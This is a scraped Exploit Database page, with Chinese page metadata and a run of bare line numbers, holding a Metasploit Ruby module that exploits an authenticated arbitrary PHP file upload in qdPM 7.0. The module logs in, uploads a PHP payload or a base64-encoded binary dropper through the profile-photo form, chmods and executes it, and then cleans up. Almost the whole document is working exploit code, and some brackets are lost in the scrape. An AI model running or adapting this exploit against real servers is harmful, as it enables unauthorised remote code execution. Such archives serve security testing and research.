qdPM 7.0 – Arbitrary ‘.PHP’ File Upload (Metasploit)

Exploit Database
120 阅读

作者： Metasploit

日期： 2012-10-10
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/21835/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::EXE

def initialize(info={})

super(update_info(info,

'Name' => "qdPM v7 Arbitrary PHP File Upload Vulnerability",

'Description'=> %q{

This module exploits a vulnerability found in qdPM - a web-based project management

software. The user profile's photo upload feature can be abused to upload any

arbitrary file onto the victim server machine, which allows remote code execution.

Please note in order to use this module, you must have a valid credential to sign

in.

'License'=> MSF_LICENSE,

'Author' =>

[

'loneferret', #Discovery, PoC

'sinn3r'#Metasploit

'References' =>

[

['OSVDB', '82978'],

['EDB', '19154']

'Payload'=>

{

'BadChars' => "\x00"

'DefaultOptions'=>

{

'ExitFunction' => "none"

'Platform' => ['linux', 'php'],

'Targets'=>

[

[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }],

[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]

'Privileged' => false,

'DisclosureDate' => "Jun 14 2012",

'DefaultTarget'=> 0))

register_options(

[

OptString.new('TARGETURI', [true, 'The base directory to sflog!', '/qdPM/']),

OptString.new('USERNAME',[true, 'The username to login with']),

OptString.new('PASSWORD',[true, 'The password to login with'])

], self.class)

end

def check

target_uri.path << '/' if target_uri.path[-1,1] != '/'

base = File.dirname("#{target_uri.path}.")

res = send_request_raw({'uri'=>"#{base}/index.php"})

if res and res.body =~ /<div id\=\"footer\"\>.+qdPM ([\d])\.([\d]).+\<\/div\>/m

major, minor = $1, $2

return Exploit::CheckCode::Vulnerable if (major+minor).to_i <= 70

end

return Exploit::CheckCode::Safe

end

def get_write_exec_payload(fname, data)

p = Rex::Text.encode_base64(generate_payload_exe)

php = %Q|

<?php

$f = fopen("#{fname}", "wb");

fwrite($f, base64_decode("#{p}"));

fclose($f);

exec("chmod 777 #{fname}");

exec("#{fname}");

php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ')

return php

end

def on_new_session(cli)

if cli.type == "meterpreter"

cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")

end

@clean_files.each do |f|

print_status("#{@peer} - Removing: #{f}")

begin

if cli.type == 'meterpreter'

cli.fs.file.rm(f)

else

cli.shell_command_token("rm #{f}")

end

rescue ::Exception => e

print_error("#{@peer} - Unable to remove #{f}: #{e.message}")

end

def login(base, username, password)

# Login

res = send_request_cgi({

'method'=> 'POST',

'uri' => "#{base}/index.php/home/login",

'vars_post' => {

'login[email]'=> username,

'login[password]' => password,

'http_referer'=> ''

# This needs to be set, otherwise we get two cookies... I don't need two cookies.

'cookie' => "qdpm=#{Rex::Text.rand_text_alpha(27)}",

'headers' => {

'Origin' => "http://#{rhost}",

'Referer' => "http://#{rhost}/#{base}/index.php/home/login"

}

})

cookie = (res and res.headers['Set-Cookie'] =~ /qdpm\=.+\;/) ? res.headers['Set-Cookie'] : ''

return {} if cookie.empty?

cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0]

# Get user data

vprint_status("#{@peer} - Enumerating user data")

res = send_request_raw({

'uri' => "#{base}/index.php/home/myAccount",

'cookie' => cookie

})

return {} if not res

if res.code == 404

print_error("#{@peer} - #{username} does not actually have a 'myAccount' page")

return {}

end

b = res.body

user_id = b.scan(/\<input type\=\"hidden\" name\=\"users\[id\]\" value\=\"(.+)\" id\=\"users\_id\" \/\>/).flatten[0] || ''

group_id = b.scan(/\<input type\=\"hidden\" name\=\"users\[users\_group\_id\]\" value\=\"(.+)\" id\=\"users\_users\_group\_id\" \/>/).flatten[0] || ''

user_active = b.scan(/\<input type\=\"hidden\" name\=\"users\[active\]\" value\=\"(.+)\" id\=\"users\_active\" \/\>/).flatten[0] || ''

opts = {

'cookie' => cookie,

'user_id' => user_id,

'group_id'=> group_id,

'user_active' => user_active

}

return opts

end

def upload_php(base, opts)

fname = opts['filename']

php_payload = opts['data']

user_id = opts['user_id']

group_id= opts['group_id']

user_active = opts['user_active']

username= opts['username']

email = opts['email']

cookie= opts['cookie']

data = Rex::MIME::Message.new

data.add_part('UsersAccountForm', nil, nil, 'form-data; name="formName"')

data.add_part('put', nil, nil, 'form-data; name="sf_method"')

data.add_part(user_id, nil, nil, 'form-data; name="users[id]"')

data.add_part(group_id, nil, nil, 'form-data; name="users[users_group_id]"')

data.add_part(user_active, nil, nil, 'form-data; name="users[active]"')

data.add_part('', nil, nil, 'form-data; name="users[skin]"')

data.add_part(username, nil, nil, 'form-data; name="users[name]"')

data.add_part(php_payload, nil, nil, "form-data; name=\"users[photo]\"; filename=\"#{fname}\"")

data.add_part('', nil, nil, 'form-data; name="preview_photo"')

data.add_part(email, nil, nil, 'form-data; name="users[email]"')

data.add_part('en_US', nil, nil, 'form-data; name="users[culture]"')

data.add_part('', nil, nil, 'form-data; name="new_password"')

post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

res = send_request_cgi({

'method'=> 'POST',

'uri' => "#{base}/index.php/home/myAccount",

'ctype' => "multipart/form-data; boundary=#{data.bound}",

'data'=> post_data,

'cookie'=> cookie,

'headers' => {

'Origin' => "http://#{rhost}",

'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"

}

})

return (res and res.headers['Location'] =~ /home\/myAccount$/) ? true : false

end

def exec_php(base, opts)

cookie = opts['cookie']

# When we upload a file, it will be renamed. The 'myAccount' page has that info.

res = send_request_cgi({

'uri'=> "#{base}/index.php/home/myAccount",

'cookie' => cookie

})

if not res

print_error("#{@peer} - Unable to request the file")

return

end

fname = res.body.scan(/\<input type\=\"hidden\" name\=\"preview\_photo\" id\=\"preview\_photo\" value\=\"(\d+\-\w+\.php)\" \/\>/).flatten[0] || ''

if fname.empty?

print_error("#{@peer} - Unable to extract the real filename")

return

end

# Now that we have the filename, request it

print_status("#{@peer} - Uploaded file was renmaed as '#{fname}'")

send_request_raw({'uri'=>"#{base}/uploads/users/#{fname}"})

handler

end

def exploit

@peer = "#{rhost}:#{rport}"

target_uri.path << '/' if target_uri.path[-1,1] != '/'

base = File.dirname("#{target_uri.path}.")

user = datastore['USERNAME']

pass = datastore['PASSWORD']

print_status("#{@peer} - Attempt to login with '#{user}:#{pass}'")

opts = login(base, user, pass)

if opts.empty?

print_error("#{@peer} - Login unsuccessful")

return

end

php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"

@clean_files = [php_fname]

case target['Platform']

when 'php'

p = "<?php #{payload.encoded} ?>"

when 'linux'

bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"

@clean_files << bin_name

bin = generate_payload_exe

p = get_write_exec_payload("/tmp/#{bin_name}", bin)

end

print_status("#{@peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")

opts = opts.merge({

'username' => user.scan(/^(.+)\@.+/).flatten[0] || '',

'email'=> user,

'filename' => php_fname,

'data' => p

})

uploader = upload_php(base, opts)

if not uploader

print_error("#{@peer} - Unable to upload")

return

end

print_status("#{@peer} - Executing '#{php_fname}'")

exec_php(base, opts)

end